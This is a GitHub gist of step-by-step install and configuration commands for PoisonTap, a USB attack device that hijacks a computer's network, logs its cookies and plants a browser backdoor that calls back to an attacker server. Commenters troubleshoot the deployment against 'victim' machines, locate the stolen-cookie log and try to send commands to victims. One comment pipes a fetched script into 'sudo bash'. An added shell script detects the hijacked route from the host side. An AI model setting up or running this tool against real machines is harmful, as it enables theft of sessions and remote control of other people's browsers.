@jgamblin
Created November 19, 2016 02:06
PoisonTap Install Commands
##Server:
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
cd poisontap
screen
sudo node backend_server.js
#the server must be reachable on TCP port 1337 from the victim's network
##piZero:
sudo apt-get update && sudo apt-get upgrade
sudo apt-get -y install isc-dhcp-server dsniff screen nodejs git
git clone https://github.com/samyk/poisontap
Update ws://YOUR.DOMAIN:1337 in backdoor.html to your server's public IP or hostname, e.g.:
ws://poisontap.jgamblin.com:1337
#add this to /etc/network/interfaces (the 0.0.0.0 netmask is deliberate: it makes the victim treat the whole IPv4 space as on-link behind usb0):
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 1.0.0.1
netmask 0.0.0.0
#Setup to run at boot:
sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh
add this to /etc/rc.local right above exit 0:
/etc/init.d/pi_startup.sh &
#DHCP:
sudo cp -f /home/pi/poisontap/dhcpd.conf /etc/dhcp/dhcpd.conf
add this to /etc/default/isc-dhcp-server:
INTERFACES="usb0"
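
The piZero steps above assume pi_startup.sh can bring up the USB gadget, and most of the thread below is about that step failing ("can't cd to /sys/kernel/config/usb_gadget", "File exists", "I/O error", "Device or resource busy" on a second run). The script below is an added example, not the gist's pi_startup.sh and not code from the PoisonTap project: it composes a CDC ECM (or RNDIS) Ethernet gadget through libcomposite's configfs API and binds it to the Pi Zero's UDC, and it is safe to run twice. It assumes dtoverlay=dwc2 is in /boot/config.txt and the dwc2 and libcomposite modules are loaded (the libcomposite route replaces the old modules-load=dwc2,g_ether method). The gadget name "poisontap", the vendor/product IDs and the CONFIGFS/UDC parameters are the example's own choices; the parameters exist so the functions can be exercised against a scratch directory on a machine without a UDC.

```shell
#!/bin/sh
# Added example (not the gist's pi_startup.sh, not PoisonTap project code):
# compose a USB Ethernet gadget via libcomposite/configfs and bind it to the
# Pi Zero's UDC, idempotently. A second run (e.g. from rc.local after a manual
# test) is a no-op instead of failing with "ln: File exists", "echo: I/O error"
# or "Device or resource busy".
#
# Assumptions (not from the gist): dtoverlay=dwc2 is in /boot/config.txt and
# the dwc2 and libcomposite modules are loaded. CONFIGFS, GADGET_NAME, FUNC and
# the UDC name are parameters so this can be tested against a scratch directory.
set -eu

CONFIGFS="${CONFIGFS:-/sys/kernel/config}"
GADGET_NAME="${GADGET_NAME:-poisontap}"
# ecm.usb0 = CDC ECM (macOS and Linux hosts); rndis.usb0 = RNDIS (Windows hosts).
# Both are libcomposite function names.
FUNC="${FUNC:-ecm.usb0}"

# Fail with a readable message instead of the bare "can't cd to
# /sys/kernel/config/usb_gadget" from a script that assumes the directory.
check_configfs() {
    if [ ! -d "$1/usb_gadget" ]; then
        echo "$1/usb_gadget missing: is libcomposite loaded and configfs mounted?" >&2
        return 1
    fi
}

# True when the gadget is already bound (UDC attribute non-empty). Attribute
# writes on a bound gadget fail, which is where the "echo: I/O error" comes from.
gadget_is_bound() {
    [ -n "$(cat "$1/UDC" 2>/dev/null)" ]
}

# Create (or complete) the gadget tree. mkdir -p plus a guarded ln -s make
# every step safe to repeat.
build_gadget() {
    root="$1/usb_gadget/$2"; func="$3"
    mkdir -p "$root"
    echo 0x1d6b > "$root/idVendor"      # Linux Foundation
    echo 0x0104 > "$root/idProduct"     # Multifunction Composite Gadget
    mkdir -p "$root/strings/0x409"
    echo 0123456789     > "$root/strings/0x409/serialnumber"
    echo "poisontap"    > "$root/strings/0x409/manufacturer"
    echo "USB Ethernet" > "$root/strings/0x409/product"
    mkdir -p "$root/configs/c.1/strings/0x409"
    echo "$func" > "$root/configs/c.1/strings/0x409/configuration"
    echo 250 > "$root/configs/c.1/MaxPower"
    mkdir -p "$root/functions/$func"
    # The ln -s is what fails with "File exists" on a rerun; link only once.
    [ -L "$root/configs/c.1/$func" ] || ln -s "$root/functions/$func" "$root/configs/c.1/$func"
}

# Bind to the UDC named in $2, or to the first one listed under /sys/class/udc.
bind_gadget() {
    root="$1"; udc="${2:-}"
    [ -n "$udc" ] || udc="$(ls /sys/class/udc 2>/dev/null | head -n 1)"
    if [ -z "$udc" ]; then
        echo "no UDC under /sys/class/udc (dwc2 overlay/module not active?)" >&2
        return 1
    fi
    echo "$udc" > "$root/UDC"
}

# Whole sequence; returns 0 on success or when the gadget was already up.
setup_usb_gadget() {
    configfs="$1"; name="$2"; func="$3"; udc="${4:-}"
    check_configfs "$configfs" || return 1
    root="$configfs/usb_gadget/$name"
    if gadget_is_bound "$root"; then
        echo "$name already bound to $(cat "$root/UDC"); nothing to do"
        return 0
    fi
    build_gadget "$configfs" "$name" "$func"
    bind_gadget "$root" "$udc"
}

# Only touch the real configfs when explicitly asked:  sudo sh gadget.sh apply
if [ "${1:-}" = apply ]; then
    setup_usb_gadget "$CONFIGFS" "$GADGET_NAME" "$FUNC"
fi
```

Run it as `sudo sh gadget.sh apply` (or call it from rc.local the way the gist calls pi_startup.sh); set `FUNC=rndis.usb0` for Windows targets. Because the bound-check happens before any attribute write, a reboot-time run after a manual test simply reports "already bound" instead of spraying errors.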
@Uniquellama

Uniquellama commented Nov 20, 2016

So I did everything under the "piZero" and "Setup to run at Boot" categories. I'm assuming there's no reason to set up Server as I am not running a server; however, would I do what is under the DHCP tag on the piZero, or would this be done somewhere else? From what I have done in the second and third category, it does nothing when plugged into a Mac or Windows. I did this on Raspbian.

@Stephen2929

Stephen2929 commented Nov 20, 2016

I assume the Pi Zero gadget mode also needs to be set up, e.g. modules-load=dwc2,g_ether etc.? Or does the writing to /sys/kernel/config/usb_gadget/ supersede that?

@BustedSec

For it to work correctly, you need the server component to catch the backdoor it installs in the browser cache. You don't need an actual "server", just any internet-facing box with ports open. A VPS would do fine.

@BustedSec

You need to set the Pi Zero to run DHCP on the usb0 Ethernet port, so in order to do that you need to make the modifications mentioned under the #DHCP section.

@Stephen2929

$ echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt
$ echo "dwc2" | sudo tee -a /etc/modules
$ echo "libcomposite" | sudo tee -a /etc/modules
// don't need the modules-load=dwc2,g_ether in /boot/cmdline.txt [that's the old g_ether way]

@Stephen2929

dhcp correction: copy the poisontap/dhcpd.conf to /etc/dhcp/dhcpd.conf

@Uniquellama

My issue is that the Pi is not recognized by any computer when I plug it in anyway. I made the changes under #DHCP, but computers don't pick up any Ethernet port when I plug the Pi in. I've tried both micro USB ports on the Pi.

@Stephen2929

Stephen2929 commented Nov 21, 2016

Try with the Pi Zero connected to an HDMI screen. Do you see it setting up a usb0 device, or do you see errors? I'm still getting "can't cd to /sys/kernel/config/usb_gadget" and no usb0 device -- update: working now as a CDC ECM device
Update 2 - the latest install notes set it up as a g_ether remote NDIS device

@ticarpi

ticarpi commented Nov 24, 2016

I'm also having issues bringing up the usb0 device.
Getting the error "can't cd to /sys/kernel/config/usb_gadget" from the /etc/init.d/pi_startup.sh script

I followed all the instructions in pi.txt above.
How to set up as CDC ECM device (if that would help)?

@muhackl

muhackl commented Nov 25, 2016

I am getting the following when trying to start the backend_server.js via sudo node backend_server.js on my server (which is actually another Raspberry Pi). What am I doing wrong?

/home/pi/backend_server.js:9
var server = http.createServer((request, response) => {
^
SyntaxError: Unexpected token >
at Module._compile (module.js:439:25)
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:906:3

@Nz05012000

I have the same problem, muhackl!

@NotSethGreen

Everything worked for me from ##PiZero onward.
My issue is, it connects as an Ethernet device, green-lights, reads connected, but it just stops all web traffic dead.

The browser will read "resolving host" and then eventually just give me a "there is no internet connection" error.

I've followed the steps multiple times to the same results.
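
What the victim sees once the gadget is up is a consequence of the gist's interfaces stanza and DHCP lease (address 1.0.0.1, netmask 0.0.0.0): the host is told that the entire IPv4 space is on-link behind usb0, so every packet is handed to the Pi, and if the Pi is not forwarding, the browser sits at "resolving host". The check below is an added example, not part of the gist or of the PoisonTap project: it reads `ip route show` output from a Linux host and flags any on-link route (no "via" gateway) with a prefix shorter than /8, which is what a PoisonTap-style interface leaves in the table. It is useful both for confirming the setup from the victim side and as a quick host check for a defender. The sample tables are constructed for this example; the exact wording of the kernel's `ip route` output can vary slightly between versions. Caveat: PPP links and some VPN tunnels also install on-link defaults, so a hit is a lead, not a verdict.

```shell
#!/bin/sh
# Added example, not part of the gist or of PoisonTap: inspect a Linux host's
# IPv4 routing table for a PoisonTap-style interface. The gist's 0.0.0.0
# netmask makes the host believe the whole IPv4 space is on-link behind usb0,
# which shows up in `ip route` as an on-link default (no "via") on that device.
# Caveat: PPP and some VPN tunnels also install on-link defaults.
set -eu

# Prefix length of a destination as printed by `ip route`:
# "default" -> 0, "a.b.c.d/n" -> n, bare "a.b.c.d" (host route) -> 32.
prefix_len() {
    case "$1" in
        default) echo 0 ;;
        */*)     echo "${1##*/}" ;;
        *)       echo 32 ;;
    esac
}

# Reads `ip route show` output on stdin and prints "<dev> <destination>" for
# each on-link route with a prefix shorter than /8. Prints nothing when clean.
find_onlink_hijack() {
    while read -r dest rest; do
        [ -n "$dest" ] || continue
        # A route with a gateway is a normal default; skip it.
        case " $rest " in *" via "*) continue ;; esac
        [ "$(prefix_len "$dest")" -lt 8 ] || continue
        dev=""
        set -- $rest
        while [ $# -ge 2 ]; do
            [ "$1" = dev ] && dev="$2"
            shift
        done
        echo "${dev:-?} $dest"
    done
}

# 0 when the table passed as $1 has no suspicious route, 1 otherwise.
route_table_is_clean() {
    [ -z "$(printf '%s\n' "$1" | find_onlink_hijack)" ]
}

# Constructed sample: a laptop on Wi-Fi with a PoisonTap gadget plugged in.
# The second line is the /0 prefix route the kernel derives from 1.0.0.5/0.
SAMPLE_HIJACKED='default via 192.168.1.1 dev wlan0 proto dhcp metric 600
default dev usb0 proto kernel scope link src 1.0.0.5 metric 100
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600'

# Constructed sample: the same laptop without the gadget.
SAMPLE_CLEAN='default via 192.168.1.1 dev wlan0 proto dhcp metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600'

# Run against the live table with:  sh route_check.sh live
if [ "${1:-}" = live ]; then
    ip route show | find_onlink_hijack
fi
```

On the constructed hijacked table the check prints `usb0 default`; the Wi-Fi default is ignored because it goes via a gateway, and the /24 is too specific to matter.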

@muhackl

muhackl commented Nov 27, 2016

@Nz05012000 I solved it the following way:
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt-get install nodejs

After the latest version of node (7.2) is installed, the backend_server.js starts!

@Nz05012000

@muhackl Thank you, that helped me!

@danthegoodman1

Question: for the ws://YOUR.DOMAIN:1337, do you have to have something like poisontap.whatever.com:1337, or can you just use an external IP like ##.##.###.###:1337? Is the subdomain pointing to anything in particular? Or, as long as it is all consistent across the Pi and the server, would a bare IP be ok (the ##.## stuff)?

@ajdulion

ajdulion commented Dec 1, 2016

hmm..

I set up my Raspberry Zero using the USB route (so no screen).

Getting the following errors when running the startup:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

Anyone know if this is because I am setting up the device via USB?

@danthegoodman1

The thing that immediately jumps out to me is the "Device or resource busy" line. Unfortunately, if the case is that it is because it is being used, then the only way to solve it would be to edit that file before it is inserted into the Pi. The only way to stop the ONLY USB port is to not use it, but the Pi does not have integrated WiFi that you could SSH into. I am by no means an expert on this, but that is what jumps out to me. I have not run that part of the installation yet, so I do not know if I will run into it or not.

@danthegoodman1

I am also wondering why this installation does not include anything about activating the g_ether, like in this tutorial (found through the poisontap GitHub): samyk/poisontap@068c283

@ajdulion

ajdulion commented Dec 2, 2016

Well, it seems to run, but now I have no clue where to find the cookies on my test setup. This tool is missing some manual/tutorials, I'm guessing..

@Stephen2929

poisontap/poisontap.cookies.log

@danthegoodman1

danthegoodman1 commented Dec 2, 2016

@Stephen2929 have you had success with the server side? (I finally got it working; the tutorial above is not very good. Note to everyone: use the link I posted, and do part 2 before part 1.) But when sending commands on the server, nothing is getting sent to the victim machine. I see that it was sent, and then on the screen that the backend is running on I see that it was requested. But when I send commands, like an alert command, nothing happens on the victim machine. Going through all of the logs I cannot see any evidence of anything being sent to the machine. Also, when looking at the network graph, samy's has lots of color. Mine is mostly gray however, and in the console I am getting 404 on almost all domain/poisontap links (I assume that is normal because those links don't actually exist). Any help would be greatly appreciated.

Edit: Update

@rinkunamaste

I tried all steps described in pi.txt, but the Raspberry Pi Zero is not able to create a virtual Ethernet port on Windows 7 and Windows 10. Anyone else had the same problem and sorted it out? I will appreciate any response. Thanks

@himuura

himuura commented Dec 10, 2016

Same issue... followed all the pi.txt steps and still I haven't got a new Ethernet device. Both on Windows 7, 8.1 and 10. Perhaps some step is missing?

@mkmxu

mkmxu commented Dec 12, 2016

When I type "git clone https://github.com/samyk/poisontap"

I get this response

Cloning into 'poisontap'...
remote: Counting objects: 396, done.
remote: Compressing objects: 100% (15/15), done.
error: RPC failed; result=56, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

Is this something I've done, or on GitHub's side? Or what? Thank you in advance for your help.

@gabyavra

gabyavra commented Dec 21, 2016

I monitor /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the Raspberry Zero. I also monitor the traffic using Wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stuck with a 169.254.X.X IP address. Any idea?

UPDATE: I made it work by reinstalling the base OS and NOT upgrading it with apt-get upgrade and BRANCH=next rpi-update. It seems that if I updated it, something went wrong; I don't know if the Ethernet emulation or DHCP, since both seem to work fine at first preview. I think the Ethernet emulation was to blame, since the ping between computer and Raspberry didn't work, even when I configured the computer with a static IP address!

@gersey2002

Does anyone have a tutorial on getting the back end server running? I'm not having any luck with it.

@eliddell1

eliddell1 commented Mar 14, 2017

I too am getting this error on startup:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

Anyone know if this is because I am setting up the device via USB?

Can someone please help? @ajdulion, how did you get this working?

@theCake75

@eliddell1 @ajdulion I have exactly the same problem, can you help me please?

@morpheuslord

I am not able to get the headless operations working. The RNDIS drivers are not supported; anyone have any idea how I can solve this?

This is what it looks like now.
This is the error

This device cannot start. (Code 10)

{Operation Failed}
The requested operation was unsuccessful.
